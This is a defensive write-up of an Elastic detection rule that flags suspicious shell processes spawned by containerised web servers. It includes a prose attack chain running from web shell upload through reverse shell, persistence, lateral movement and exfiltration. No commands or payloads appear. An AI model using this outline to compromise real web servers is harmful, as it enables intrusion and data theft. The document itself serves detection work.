Suspicious Web Server Child Process Execution via Elastic Defend for Containers

This detection rule, sourced from Elastic’s detection rules repository and designed for use with Elastic Defend for Containers, identifies potential web server exploitation attempts. The rule focuses on detecting suspicious processes spawned by web server user accounts within containers. This can be indicative of attackers uploading web shells or exploiting remote command execution vulnerabilities to maintain access. The rule specifically looks for parent processes like nginx, apache2, or php-fpm executing shell commands with suspicious arguments. The rule was initially created on 2026/02/06 and updated on 2026/06/01, with a minimum stack version of 9.3.0, when Defend for Containers integration was reintroduced. It is important for defenders to monitor such activity as it can lead to persistence, lateral movement, and further compromise within the containerized environment.

Attack Chain

1. Initial Access: Attacker gains initial access to the web server, potentially through a vulnerability such as remote code execution (RCE) or by exploiting weak credentials.
2. Web Shell Upload: The attacker uploads a web shell (e.g., PHP shell) to a publicly accessible directory on the web server.
3. Command Execution: The attacker uses the web shell to execute commands on the server, often using a web-service account.
4. Suspicious Process Spawn: The web server process spawns a shell process (e.g., bash, sh) with suspicious arguments, such as those used for reverse shells, file manipulation, or credential access.
5. Persistence: The attacker establishes persistence by creating cron jobs or modifying system files.
6. Lateral Movement: The attacker uses the compromised server as a pivot point to move laterally within the network, potentially targeting other containers or hosts.
7. Command and Control: The attacker establishes a command and control (C2) channel with an external server to remotely control the compromised system.
8. Data Exfiltration/System Damage: The attacker exfiltrates sensitive data or causes damage to the system, depending on their objectives.

Impact

Successful exploitation of web servers can lead to a range of negative consequences, including data breaches, system compromise, and financial losses. Attackers can use compromised web servers to steal sensitive data, launch attacks on other systems, or disrupt business operations. The potential impact is significant, particularly for organizations that rely on web applications to conduct business. The severity is rated high due to the potential for significant damage and the relative ease with which such attacks can be carried out.

Recommendation

• Deploy the “Web Server Exploitation Detected via Defend for Containers” EQL rule to your Elastic Stack instance to detect suspicious process execution by web servers.
• Enable Elastic Defend for Containers with a minimum stack version of 9.3.0 to collect the necessary data for the rule to function.
• Prioritize investigation of alerts generated by the rule with a risk score of 73, particularly those involving reverse shells, file access, or credential access, as indicated in the rule’s query.
• Review and tune the rule’s query to reduce false positives based on your specific environment and application configurations, as described in the “False positive analysis” section of the rule’s note.
• Implement network segmentation and egress filtering to limit the potential impact of compromised containers, as suggested in the “Response and remediation” section of the rule’s note.